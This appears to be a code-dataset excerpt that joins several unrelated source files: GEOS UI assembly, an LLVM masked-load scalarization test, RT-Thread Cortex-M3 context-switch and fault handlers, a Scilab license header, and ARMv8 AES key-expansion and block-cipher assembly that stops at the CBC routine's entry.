KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 3/24/92 Initial version
------------------------------------------------------------------------------@
;
; Update this selector's color and draw-mask UI from notification data:
; dxcx = color, al = draw mask, di = diff flags marking attributes that
; differ across the selection (indeterminate state).
;
UpdateLineColorCommon proc near uses bp
.enter
; push bx ;save hatch
push ax ;save draw mask
; update color
mov bp, di
and bp, mask GOBLAD_MULTIPLE_COLORS ;bp = indeterm
mov ax, MSG_COLOR_SELECTOR_UPDATE_COLOR
call ObjCallInstanceNoLock
; update draw mask
pop cx ; cx = draw mask saved above
mov dx, di
and dx, mask GOBLAD_MULTIPLE_MASKS ; nonzero = indeterminate mask
mov ax, MSG_COLOR_SELECTOR_UPDATE_DRAW_MASK
call ObjCallInstanceNoLock
.leave
ret
UpdateLineColorCommon endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GetLineNotifyColor
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Common routine to get notification data for color
CALLED BY: GrObjLineColorSelectorUpdateUI(), CharBGColorControlUpdateUI()
PASS: ss:bp - GenControlUpdateUIParams
GCUUIP_manufacturer ManufacturerID
GCUUIP_changeType word
GCUUIP_dataBlock hptr
GCUUIP_toolInteraction optr
GCUUIP_features word
GCUUIP_toolboxFeatures word
GCUUIP_childBlock hptr
dx - NotifyStandardNotificationTypes to match
NOTE: this notification type must use NotifyColorChange
RETURN: ds - seg addr of notification block
z flag - set if common color notification:
di - VisTextCharAttrFlags
VTCAF_MULTIPLE_COLORS
VTCAF_MULTIPLE_GRAY_SCREENS
-or-
VTCAF_MULTIPLE_BG_COLORS
VTCAF_MULTIPLE_BG_GRAY_SCREENS
-or-
VTPAF_MULTIPLE_BG_COLORS
VTPAF_MULTIPLE_BG_GRAY_SCREENS
-or-
VTPABF_MULTIPLE_BORDER_COLORS
VTPABF_MULTIPLE_BORDER_GRAY_SCREENS
ax - SystemDrawMask
dxcx - color
bx - GraphicPattern
DESTROYED: none
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
eca 2/26/92 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GetLineNotifyColor proc near
.enter
;
; Lock the notification data block and check that its change type matches
; the one requested in dx.  The block is left locked in both cases; the
; caller is responsible for unlocking it.
;
mov bx, ss:[bp].GCUUIP_dataBlock ;bx <- notification block
call MemLock
mov ds, ax ; ds = segment of the locked notification data
clr ax ; ax = 0 (ah cleared; al filled in below on a match)
cmp ss:[bp].GCUUIP_changeType, dx ;common type?
jne done ;branch if not (Z clear for caller)
;
; Extract the line attributes from the notification structure:
; draw mask, RGB color components and the multiple-attribute diff flags.
; (The subsequent movs do not touch flags, so Z from the cmp above is
; still set on return.)
;
mov al, ds:[GNLAC_lineAttr].GOBLAE_mask
mov ch, CF_RGB
mov cl, ds:[GNLAC_lineAttr].GOBLAE_r
mov dh, ds:[GNLAC_lineAttr].GOBLAE_b
mov dl, ds:[GNLAC_lineAttr].GOBLAE_g
; mov bx, {word} ds:NCC_pattern
mov di, ds:[GNLAC_lineAttrDiffs]
done:
.leave
ret
GetLineNotifyColor endp
GrObjUIControllerCode ends
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt -S %s -scalarize-masked-mem-intrin -mtriple=x86_64-linux-gnu | FileCheck %s
; Variable mask: each lane is scalarized into a branch around a scalar
; load, with phis merging the loaded value with the passthru lane.
define <2 x i64> @scalarize_v2i64(<2 x i64>* %p, <2 x i1> %mask, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i64>* [[P:%.*]] to i64*
; CHECK-NEXT: [[TMP2:%.*]] = extractelement <2 x i1> [[MASK:%.*]], i64 0
; CHECK-NEXT: br i1 [[TMP2]], label [[COND_LOAD:%.*]], label [[ELSE:%.*]]
; CHECK: cond.load:
; CHECK-NEXT: [[TMP3:%.*]] = getelementptr inbounds i64, i64* [[TMP1]], i32 0
; CHECK-NEXT: [[TMP4:%.*]] = load i64, i64* [[TMP3]], align 8
; CHECK-NEXT: [[TMP5:%.*]] = insertelement <2 x i64> [[PASSTHRU:%.*]], i64 [[TMP4]], i64 0
; CHECK-NEXT: br label [[ELSE]]
; CHECK: else:
; CHECK-NEXT: [[RES_PHI_ELSE:%.*]] = phi <2 x i64> [ [[TMP5]], [[COND_LOAD]] ], [ [[PASSTHRU]], [[TMP0:%.*]] ]
; CHECK-NEXT: [[TMP6:%.*]] = extractelement <2 x i1> [[MASK]], i64 1
; CHECK-NEXT: br i1 [[TMP6]], label [[COND_LOAD1:%.*]], label [[ELSE2:%.*]]
; CHECK: cond.load1:
; CHECK-NEXT: [[TMP7:%.*]] = getelementptr inbounds i64, i64* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP8:%.*]] = load i64, i64* [[TMP7]], align 8
; CHECK-NEXT: [[TMP9:%.*]] = insertelement <2 x i64> [[RES_PHI_ELSE]], i64 [[TMP8]], i64 1
; CHECK-NEXT: br label [[ELSE2]]
; CHECK: else2:
; CHECK-NEXT: [[RES_PHI_ELSE3:%.*]] = phi <2 x i64> [ [[TMP9]], [[COND_LOAD1]] ], [ [[RES_PHI_ELSE]], [[ELSE]] ]
; CHECK-NEXT: ret <2 x i64> [[RES_PHI_ELSE3]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 128, <2 x i1> %mask, <2 x i64> %passthru)
ret <2 x i64> %ret
}
; All-ones constant mask: folds to a plain (unmasked) vector load.
define <2 x i64> @scalarize_v2i64_ones_mask(<2 x i64>* %p, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64_ones_mask(
; CHECK-NEXT: [[TMP1:%.*]] = load <2 x i64>, <2 x i64>* [[P:%.*]], align 8
; CHECK-NEXT: ret <2 x i64> [[TMP1]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 8, <2 x i1> <i1 true, i1 true>, <2 x i64> %passthru)
ret <2 x i64> %ret
}
; All-zero constant mask: no loads remain; the passthru is returned.
define <2 x i64> @scalarize_v2i64_zero_mask(<2 x i64>* %p, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64_zero_mask(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i64>* [[P:%.*]] to i64*
; CHECK-NEXT: ret <2 x i64> [[PASSTHRU:%.*]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 8, <2 x i1> <i1 false, i1 false>, <2 x i64> %passthru)
ret <2 x i64> %ret
}
; Mixed constant mask <false, true>: only lane 1 is loaded, branch-free.
define <2 x i64> @scalarize_v2i64_const_mask(<2 x i64>* %p, <2 x i64> %passthru) {
; CHECK-LABEL: @scalarize_v2i64_const_mask(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i64>* [[P:%.*]] to i64*
; CHECK-NEXT: [[TMP2:%.*]] = getelementptr inbounds i64, i64* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP3:%.*]] = load i64, i64* [[TMP2]], align 8
; CHECK-NEXT: [[TMP4:%.*]] = insertelement <2 x i64> [[PASSTHRU:%.*]], i64 [[TMP3]], i64 1
; CHECK-NEXT: ret <2 x i64> [[TMP4]]
;
%ret = call <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>* %p, i32 8, <2 x i1> <i1 false, i1 true>, <2 x i64> %passthru)
ret <2 x i64> %ret
}
; This use a byte sized but non power of 2 element size. This used to crash due to bad alignment calculation.
; Non-power-of-2 element width (i24): regression test for the alignment
; computation (note the per-element align 1 in the scalarized loads).
define <2 x i24> @scalarize_v2i24(<2 x i24>* %p, <2 x i1> %mask, <2 x i24> %passthru) {
; CHECK-LABEL: @scalarize_v2i24(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i24>* [[P:%.*]] to i24*
; CHECK-NEXT: [[TMP2:%.*]] = extractelement <2 x i1> [[MASK:%.*]], i64 0
; CHECK-NEXT: br i1 [[TMP2]], label [[COND_LOAD:%.*]], label [[ELSE:%.*]]
; CHECK: cond.load:
; CHECK-NEXT: [[TMP3:%.*]] = getelementptr inbounds i24, i24* [[TMP1]], i32 0
; CHECK-NEXT: [[TMP4:%.*]] = load i24, i24* [[TMP3]], align 1
; CHECK-NEXT: [[TMP5:%.*]] = insertelement <2 x i24> [[PASSTHRU:%.*]], i24 [[TMP4]], i64 0
; CHECK-NEXT: br label [[ELSE]]
; CHECK: else:
; CHECK-NEXT: [[RES_PHI_ELSE:%.*]] = phi <2 x i24> [ [[TMP5]], [[COND_LOAD]] ], [ [[PASSTHRU]], [[TMP0:%.*]] ]
; CHECK-NEXT: [[TMP6:%.*]] = extractelement <2 x i1> [[MASK]], i64 1
; CHECK-NEXT: br i1 [[TMP6]], label [[COND_LOAD1:%.*]], label [[ELSE2:%.*]]
; CHECK: cond.load1:
; CHECK-NEXT: [[TMP7:%.*]] = getelementptr inbounds i24, i24* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP8:%.*]] = load i24, i24* [[TMP7]], align 1
; CHECK-NEXT: [[TMP9:%.*]] = insertelement <2 x i24> [[RES_PHI_ELSE]], i24 [[TMP8]], i64 1
; CHECK-NEXT: br label [[ELSE2]]
; CHECK: else2:
; CHECK-NEXT: [[RES_PHI_ELSE3:%.*]] = phi <2 x i24> [ [[TMP9]], [[COND_LOAD1]] ], [ [[RES_PHI_ELSE]], [[ELSE]] ]
; CHECK-NEXT: ret <2 x i24> [[RES_PHI_ELSE3]]
;
%ret = call <2 x i24> @llvm.masked.load.v2i24.p0v2i24(<2 x i24>* %p, i32 8, <2 x i1> %mask, <2 x i24> %passthru)
ret <2 x i24> %ret
}
; This use a byte sized but non power of 2 element size. This used to crash due to bad alignment calculation.
; Non-power-of-2 element width (i48): alignment regression test (element
; accesses drop to align 2, gcd of the requested align 16 and 6-byte
; element spacing).
define <2 x i48> @scalarize_v2i48(<2 x i48>* %p, <2 x i1> %mask, <2 x i48> %passthru) {
; CHECK-LABEL: @scalarize_v2i48(
; CHECK-NEXT: [[TMP1:%.*]] = bitcast <2 x i48>* [[P:%.*]] to i48*
; CHECK-NEXT: [[TMP2:%.*]] = extractelement <2 x i1> [[MASK:%.*]], i64 0
; CHECK-NEXT: br i1 [[TMP2]], label [[COND_LOAD:%.*]], label [[ELSE:%.*]]
; CHECK: cond.load:
; CHECK-NEXT: [[TMP3:%.*]] = getelementptr inbounds i48, i48* [[TMP1]], i32 0
; CHECK-NEXT: [[TMP4:%.*]] = load i48, i48* [[TMP3]], align 2
; CHECK-NEXT: [[TMP5:%.*]] = insertelement <2 x i48> [[PASSTHRU:%.*]], i48 [[TMP4]], i64 0
; CHECK-NEXT: br label [[ELSE]]
; CHECK: else:
; CHECK-NEXT: [[RES_PHI_ELSE:%.*]] = phi <2 x i48> [ [[TMP5]], [[COND_LOAD]] ], [ [[PASSTHRU]], [[TMP0:%.*]] ]
; CHECK-NEXT: [[TMP6:%.*]] = extractelement <2 x i1> [[MASK]], i64 1
; CHECK-NEXT: br i1 [[TMP6]], label [[COND_LOAD1:%.*]], label [[ELSE2:%.*]]
; CHECK: cond.load1:
; CHECK-NEXT: [[TMP7:%.*]] = getelementptr inbounds i48, i48* [[TMP1]], i32 1
; CHECK-NEXT: [[TMP8:%.*]] = load i48, i48* [[TMP7]], align 2
; CHECK-NEXT: [[TMP9:%.*]] = insertelement <2 x i48> [[RES_PHI_ELSE]], i48 [[TMP8]], i64 1
; CHECK-NEXT: br label [[ELSE2]]
; CHECK: else2:
; CHECK-NEXT: [[RES_PHI_ELSE3:%.*]] = phi <2 x i48> [ [[TMP9]], [[COND_LOAD1]] ], [ [[RES_PHI_ELSE]], [[ELSE]] ]
; CHECK-NEXT: ret <2 x i48> [[RES_PHI_ELSE3]]
;
%ret = call <2 x i48> @llvm.masked.load.v2i48.p0v2i48(<2 x i48>* %p, i32 16, <2 x i1> %mask, <2 x i48> %passthru)
ret <2 x i48> %ret
}
declare <2 x i24> @llvm.masked.load.v2i24.p0v2i24(<2 x i24>*, i32, <2 x i1>, <2 x i24>)
declare <2 x i48> @llvm.masked.load.v2i48.p0v2i48(<2 x i48>*, i32, <2 x i1>, <2 x i48>)
declare <2 x i64> @llvm.masked.load.v2i64.p0v2i64(<2 x i64>*, i32, <2 x i1>, <2 x i64>)
| {
"language": "Assembly"
} |
;/*
; * Copyright (c) 2006-2018, RT-Thread Development Team
; *
; * SPDX-License-Identifier: Apache-2.0
; *
; * Change Logs:
; * Date Author Notes
; * 2009-01-17 Bernard first version
; * 2009-09-27 Bernard add protect when contex switch occurs
; * 2013-06-18 aozima add restore MSP feature.
; * 2013-07-09 aozima enhancement hard fault exception handler.
; */
;/**
; * @addtogroup cortex-m3
; */
;/*@{*/
SCB_VTOR EQU 0xE000ED08 ; Vector Table Offset Register
NVIC_INT_CTRL EQU 0xE000ED04 ; interrupt control state register
NVIC_SYSPRI2 EQU 0xE000ED20 ; system priority register (2)
NVIC_PENDSV_PRI EQU 0x00FF0000 ; PendSV priority value (lowest)
NVIC_PENDSVSET EQU 0x10000000 ; value to trigger PendSV exception
SECTION .text:CODE(2)
THUMB
REQUIRE8
PRESERVE8
IMPORT rt_thread_switch_interrupt_flag
IMPORT rt_interrupt_from_thread
IMPORT rt_interrupt_to_thread
;/*
; * rt_base_t rt_hw_interrupt_disable();
; */
; rt_base_t rt_hw_interrupt_disable(void)
; Masks configurable-priority interrupts and returns the previous state.
EXPORT rt_hw_interrupt_disable
rt_hw_interrupt_disable:
MRS r0, PRIMASK ; r0 = previous PRIMASK, returned to caller
CPSID I ; mask configurable-priority interrupts
BX LR
;/*
; * void rt_hw_interrupt_enable(rt_base_t level);
; */
; void rt_hw_interrupt_enable(rt_base_t level)
; Restores the PRIMASK state returned by rt_hw_interrupt_disable().
EXPORT rt_hw_interrupt_enable
rt_hw_interrupt_enable:
MSR PRIMASK, r0 ; restore saved interrupt state
BX LR
;/*
; * void rt_hw_context_switch(rt_uint32 from, rt_uint32 to);
; * r0 --> from
; * r1 --> to
; */
; r0 = &from-thread sp slot, r1 = &to-thread sp slot.
; The switch itself is deferred to PendSV_Handler (lowest exception
; priority), so this routine only records the request and pends PendSV.
EXPORT rt_hw_context_switch_interrupt
EXPORT rt_hw_context_switch
rt_hw_context_switch_interrupt:
rt_hw_context_switch:
; set rt_thread_switch_interrupt_flag to 1
LDR r2, =rt_thread_switch_interrupt_flag
LDR r3, [r2]
CMP r3, #1
BEQ _reswitch ; switch already pending: keep original "from", update "to"
MOV r3, #1
STR r3, [r2]
LDR r2, =rt_interrupt_from_thread ; set rt_interrupt_from_thread
STR r0, [r2]
_reswitch
LDR r2, =rt_interrupt_to_thread ; set rt_interrupt_to_thread
STR r1, [r2]
LDR r0, =NVIC_INT_CTRL ; trigger the PendSV exception (causes context switch)
LDR r1, =NVIC_PENDSVSET
STR r1, [r0]
BX LR
; r0 --> switch from thread stack
; r1 --> switch to thread stack
; psr, pc, lr, r12, r3, r2, r1, r0 are pushed into [from] stack
; PendSV exception: performs the deferred context switch.  On entry the
; hardware has already pushed xPSR, pc, lr, r12, r3-r0 onto the
; from-thread's process stack; only r4-r11 are saved/restored here.
EXPORT PendSV_Handler
PendSV_Handler:
; disable interrupt to protect context switch
MRS r2, PRIMASK
CPSID I
; get rt_thread_switch_interrupt_flag
LDR r0, =rt_thread_switch_interrupt_flag
LDR r1, [r0]
CBZ r1, pendsv_exit ; pendsv already handled
; clear rt_thread_switch_interrupt_flag to 0
MOV r1, #0x00
STR r1, [r0]
LDR r0, =rt_interrupt_from_thread
LDR r1, [r0]
CBZ r1, switch_to_thread ; skip register save at the first time
MRS r1, psp ; get from thread stack pointer
STMFD r1!, {r4 - r11} ; push r4 - r11 register
LDR r0, [r0]
STR r1, [r0] ; update from thread stack pointer
switch_to_thread
LDR r1, =rt_interrupt_to_thread
LDR r1, [r1]
LDR r1, [r1] ; load thread stack pointer
LDMFD r1!, {r4 - r11} ; pop r4 - r11 register
MSR psp, r1 ; update stack pointer
pendsv_exit
; restore interrupt
MSR PRIMASK, r2
ORR lr, lr, #0x04 ; EXC_RETURN: return to thread mode using PSP
BX lr
;/*
; * void rt_hw_context_switch_to(rt_uint32 to);
; * r0 --> to
; */
; Start the first thread (no "from" context to save).  PendSV is given
; the lowest priority, pended, and taken as soon as interrupts are
; enabled below; it then restores the "to" thread's context.
EXPORT rt_hw_context_switch_to
rt_hw_context_switch_to:
LDR r1, =rt_interrupt_to_thread
STR r0, [r1]
; set from thread to 0
LDR r1, =rt_interrupt_from_thread
MOV r0, #0x0
STR r0, [r1]
; set interrupt flag to 1
LDR r1, =rt_thread_switch_interrupt_flag
MOV r0, #1
STR r0, [r1]
; set the PendSV exception priority
LDR r0, =NVIC_SYSPRI2
LDR r1, =NVIC_PENDSV_PRI
LDR.W r2, [r0,#0x00] ; read
ORR r1,r1,r2 ; modify
STR r1, [r0] ; write-back
LDR r0, =NVIC_INT_CTRL ; trigger the PendSV exception (causes context switch)
LDR r1, =NVIC_PENDSVSET
STR r1, [r0]
; restore MSP
LDR r0, =SCB_VTOR
LDR r0, [r0]
LDR r0, [r0] ; initial MSP value = first entry of the vector table
NOP
MSR msp, r0
; enable interrupts at processor level
CPSIE F
CPSIE I
; never reach here!
; compatible with old version: kept for API compatibility only; the
; actual switching is done in PendSV_Handler, so this is a no-op.
EXPORT rt_hw_interrupt_thread_switch
rt_hw_interrupt_thread_switch:
BX lr
; Hard fault: capture the full faulting context (auto-pushed frame plus
; r4-r11 and EXC_RETURN) on the faulting stack, then hand it to the C
; handler rt_hw_hard_fault_exception.
IMPORT rt_hw_hard_fault_exception
EXPORT HardFault_Handler
HardFault_Handler:
; get current context
MRS r0, msp ; get fault context from handler.
TST lr, #0x04 ; if(!EXC_RETURN[2])
BEQ _get_sp_done
MRS r0, psp ; get fault context from thread.
_get_sp_done
STMFD r0!, {r4 - r11} ; push r4 - r11 register
;STMFD r0!, {lr} ; push exec_return register
SUB r0, r0, #0x04 ; manually push EXC_RETURN (lr) below r4-r11
STR lr, [r0]
TST lr, #0x04 ; if(!EXC_RETURN[2])
BEQ _update_msp
MSR psp, r0 ; update stack pointer to PSP.
B _update_done
_update_msp
MSR msp, r0 ; update stack pointer to MSP.
_update_done
PUSH {lr}
BL rt_hw_hard_fault_exception ; r0 = pointer to the saved context
POP {lr}
ORR lr, lr, #0x04 ; return to thread mode using PSP
BX lr
END
| {
"language": "Assembly"
} |
// Scilab ( http://www.scilab.org/ ) - This file is part of Scilab
// Copyright (C) 2010 - DIGITEO - Allan CORNET
//
// Copyright (C) 2012 - 2016 - Scilab Enterprises
//
// This file is hereby licensed under the terms of the GNU GPL v2.0,
// pursuant to article 5.3.4 of the CeCILL v.2.1.
// This file was originally licensed under the terms of the CeCILL v2.1,
// and continues to be available under such terms.
// For more information, see the COPYING file which you should have received
// along with this program.
| {
"language": "Assembly"
} |
#include "arm_arch.h"
#if __ARM_MAX_ARCH__>=7
.text
.code 32
#undef __thumb2__
.align 5
Lrcon:
.long 0x01,0x01,0x01,0x01
.long 0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d @ rotate-n-splat
.long 0x1b,0x1b,0x1b,0x1b
@ int aes_v8_set_encrypt_key(const unsigned char *key (r0), int bits (r1),
@                            AES_KEY *out (r2))
@ Expands a 128/192/256-bit AES key.  The key-schedule core's SubWord
@ step is implemented with a zero-round AESE (q0 = 0), and RotWord via
@ the vtbl rotate-n-splat mask loaded from Lrcon (q2); q1 holds the
@ round constant, doubled each iteration with vshl.
@ Returns 0 on success, -1 for NULL pointers, -2 for a bad key length.
.globl _aes_v8_set_encrypt_key
#ifdef __thumb2__
.thumb_func _aes_v8_set_encrypt_key
#endif
.align 5
_aes_v8_set_encrypt_key:
Lenc_key:
mov r3,#-1 @ default return: invalid argument
cmp r0,#0
beq Lenc_key_abort
cmp r2,#0
beq Lenc_key_abort
mov r3,#-2 @ default return: unsupported key length
cmp r1,#128
blt Lenc_key_abort
cmp r1,#256
bgt Lenc_key_abort
tst r1,#0x3f
bne Lenc_key_abort
adr r3,Lrcon
cmp r1,#192
veor q0,q0,q0 @ q0 = 0 so AESE performs SubBytes only
vld1.8 {q3},[r0]! @ q3 = first 128 key bits
mov r1,#8 @ reuse r1
vld1.32 {q1,q2},[r3]! @ q1 = rcon, q2 = rotate-n-splat mask
blt Loop128
beq L192
b L256
.align 4
@ 128-bit key: 10 rounds, 8 loop iterations plus 2 unrolled tails.
Loop128:
vtbl.8 d20,{q3},d4
vtbl.8 d21,{q3},d5
vext.8 q9,q0,q3,#12
vst1.32 {q3},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
subs r1,r1,#1
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
vshl.u8 q1,q1,#1
veor q3,q3,q10
bne Loop128
vld1.32 {q1},[r3]
vtbl.8 d20,{q3},d4
vtbl.8 d21,{q3},d5
vext.8 q9,q0,q3,#12
vst1.32 {q3},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
vshl.u8 q1,q1,#1
veor q3,q3,q10
vtbl.8 d20,{q3},d4
vtbl.8 d21,{q3},d5
vext.8 q9,q0,q3,#12
vst1.32 {q3},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
veor q3,q3,q10
vst1.32 {q3},[r2]
add r2,r2,#0x50
mov r12,#10 @ rounds = 10
b Ldone
.align 4
@ 192-bit key: 12 rounds; schedule advances 6 words per iteration.
L192:
vld1.8 {d16},[r0]!
vmov.i8 q10,#8 @ borrow q10
vst1.32 {q3},[r2]!
vsub.i8 q2,q2,q10 @ adjust the mask
Loop192:
vtbl.8 d20,{q8},d4
vtbl.8 d21,{q8},d5
vext.8 q9,q0,q3,#12
vst1.32 {d16},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
subs r1,r1,#1
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vdup.32 q9,d7[1]
veor q9,q9,q8
veor q10,q10,q1
vext.8 q8,q0,q8,#12
vshl.u8 q1,q1,#1
veor q8,q8,q9
veor q3,q3,q10
veor q8,q8,q10
vst1.32 {q3},[r2]!
bne Loop192
mov r12,#12 @ rounds = 12
add r2,r2,#0x20
b Ldone
.align 4
@ 256-bit key: 14 rounds; alternating SubWord-with/without-RotWord steps.
L256:
vld1.8 {q8},[r0]
mov r1,#7
mov r12,#14 @ rounds = 14
vst1.32 {q3},[r2]!
Loop256:
vtbl.8 d20,{q8},d4
vtbl.8 d21,{q8},d5
vext.8 q9,q0,q3,#12
vst1.32 {q8},[r2]!
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
subs r1,r1,#1
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q3,q3,q9
vext.8 q9,q0,q9,#12
veor q10,q10,q1
veor q3,q3,q9
vshl.u8 q1,q1,#1
veor q3,q3,q10
vst1.32 {q3},[r2]!
beq Ldone
vdup.32 q10,d7[1]
vext.8 q9,q0,q8,#12
.byte 0x00,0x43,0xf0,0xf3 @ aese q10,q0
veor q8,q8,q9
vext.8 q9,q0,q9,#12
veor q8,q8,q9
vext.8 q9,q0,q9,#12
veor q8,q8,q9
veor q8,q8,q10
b Loop256
Ldone:
str r12,[r2] @ store round count after the schedule
mov r3,#0
Lenc_key_abort:
mov r0,r3 @ return value
bx lr
@ int aes_v8_set_decrypt_key(const unsigned char *key, int bits, AES_KEY *out)
@ Builds the encryption schedule via Lenc_key, then converts it in place
@ for equivalent-inverse-cipher decryption: the round keys are reversed
@ end-for-end and the inner ones are passed through AESIMC (InvMixColumns).
.globl _aes_v8_set_decrypt_key
#ifdef __thumb2__
.thumb_func _aes_v8_set_decrypt_key
#endif
.align 5
_aes_v8_set_decrypt_key:
stmdb sp!,{r4,lr}
bl Lenc_key @ expand the encryption schedule first
cmp r0,#0
bne Ldec_key_abort
sub r2,r2,#240 @ restore original r2
mov r4,#-16
add r0,r2,r12,lsl#4 @ end of key schedule
@ Swap first and last round keys (no AESIMC on the outermost pair).
vld1.32 {q0},[r2]
vld1.32 {q1},[r0]
vst1.32 {q0},[r0],r4
vst1.32 {q1},[r2]!
@ Walk inward from both ends, swapping and applying AESIMC to each key.
Loop_imc:
vld1.32 {q0},[r2]
vld1.32 {q1},[r0]
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
vst1.32 {q0},[r0],r4
vst1.32 {q1},[r2]!
cmp r0,r2
bhi Loop_imc
@ Middle round key: AESIMC in place.
vld1.32 {q0},[r2]
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
vst1.32 {q0},[r0]
eor r0,r0,r0 @ return value
Ldec_key_abort:
ldmia sp!,{r4,pc}
@-----------------------------------------------------------------------
@ void aes_v8_encrypt(const unsigned char *in, unsigned char *out,
@                     const AES_KEY *key)
@ In:  r0 = in (16 bytes), r1 = out (16 bytes), r2 = key schedule
@ Encrypts one 16-byte block.  r3 is loaded with the round count from
@ key->rounds (offset 240); the loop consumes round keys two at a time
@ (q0/q1), with the final round's AddRoundKey done via veor since the
@ last aese must not be followed by aesmc.
@ Clobbers: r3, q0-q2, flags.
@-----------------------------------------------------------------------
.globl _aes_v8_encrypt
#ifdef __thumb2__
.thumb_func _aes_v8_encrypt
#endif
.align 5
_aes_v8_encrypt:
ldr r3,[r2,#240]
vld1.32 {q0},[r2]!
vld1.8 {q2},[r0]
sub r3,r3,#2
vld1.32 {q1},[r2]!
Loop_enc:
@ Two rounds per iteration: AESE+AESMC with q0, then with q1.
.byte 0x00,0x43,0xb0,0xf3 @ aese q2,q0
.byte 0x84,0x43,0xb0,0xf3 @ aesmc q2,q2
vld1.32 {q0},[r2]!
subs r3,r3,#2
.byte 0x02,0x43,0xb0,0xf3 @ aese q2,q1
.byte 0x84,0x43,0xb0,0xf3 @ aesmc q2,q2
vld1.32 {q1},[r2]!
bgt Loop_enc
@ Penultimate round, then final AESE and last-round-key XOR.
.byte 0x00,0x43,0xb0,0xf3 @ aese q2,q0
.byte 0x84,0x43,0xb0,0xf3 @ aesmc q2,q2
vld1.32 {q0},[r2]
.byte 0x02,0x43,0xb0,0xf3 @ aese q2,q1
veor q2,q2,q0
vst1.8 {q2},[r1]
bx lr
@-----------------------------------------------------------------------
@ void aes_v8_decrypt(const unsigned char *in, unsigned char *out,
@                     const AES_KEY *key)
@ In:  r0 = in (16 bytes), r1 = out (16 bytes), r2 = key schedule
@ Decrypts one 16-byte block; mirror image of _aes_v8_encrypt using
@ AESD/AESIMC against the (already inverse-mixed) decryption schedule.
@ Clobbers: r3, q0-q2, flags.
@-----------------------------------------------------------------------
.globl _aes_v8_decrypt
#ifdef __thumb2__
.thumb_func _aes_v8_decrypt
#endif
.align 5
_aes_v8_decrypt:
ldr r3,[r2,#240]
vld1.32 {q0},[r2]!
vld1.8 {q2},[r0]
sub r3,r3,#2
vld1.32 {q1},[r2]!
Loop_dec:
@ Two inverse rounds per iteration: AESD+AESIMC with q0, then q1.
.byte 0x40,0x43,0xb0,0xf3 @ aesd q2,q0
.byte 0xc4,0x43,0xb0,0xf3 @ aesimc q2,q2
vld1.32 {q0},[r2]!
subs r3,r3,#2
.byte 0x42,0x43,0xb0,0xf3 @ aesd q2,q1
.byte 0xc4,0x43,0xb0,0xf3 @ aesimc q2,q2
vld1.32 {q1},[r2]!
bgt Loop_dec
@ Penultimate round, then final AESD and last-round-key XOR.
.byte 0x40,0x43,0xb0,0xf3 @ aesd q2,q0
.byte 0xc4,0x43,0xb0,0xf3 @ aesimc q2,q2
vld1.32 {q0},[r2]
.byte 0x42,0x43,0xb0,0xf3 @ aesd q2,q1
veor q2,q2,q0
vst1.8 {q2},[r1]
bx lr
@-----------------------------------------------------------------------
@ void aes_v8_cbc_encrypt(const unsigned char *in, unsigned char *out,
@                         size_t len, const AES_KEY *key,
@                         unsigned char ivec[16], int enc)
@ In:  r0 = in, r1 = out, r2 = len (truncated to a multiple of 16),
@      r3 = key schedule; stack args: r4 = ivec, r5 = enc flag.
@ CBC mode.  Encryption is inherently serial (each block depends on the
@ previous ciphertext), so it runs one block at a time with specialized
@ paths for 128-bit (Lcbc_enc128) and the general/192/256 key sizes.
@ Decryption has no such dependency and is software-pipelined three
@ blocks wide (Loop3x_cbc_dec) with a 1-2 block tail (Lcbc_dec_tail).
@ The last 7 round keys are kept resident in q10-q15/q7 throughout.
@ The final IV is written back to ivec on exit.
@-----------------------------------------------------------------------
.globl _aes_v8_cbc_encrypt
#ifdef __thumb2__
.thumb_func _aes_v8_cbc_encrypt
#endif
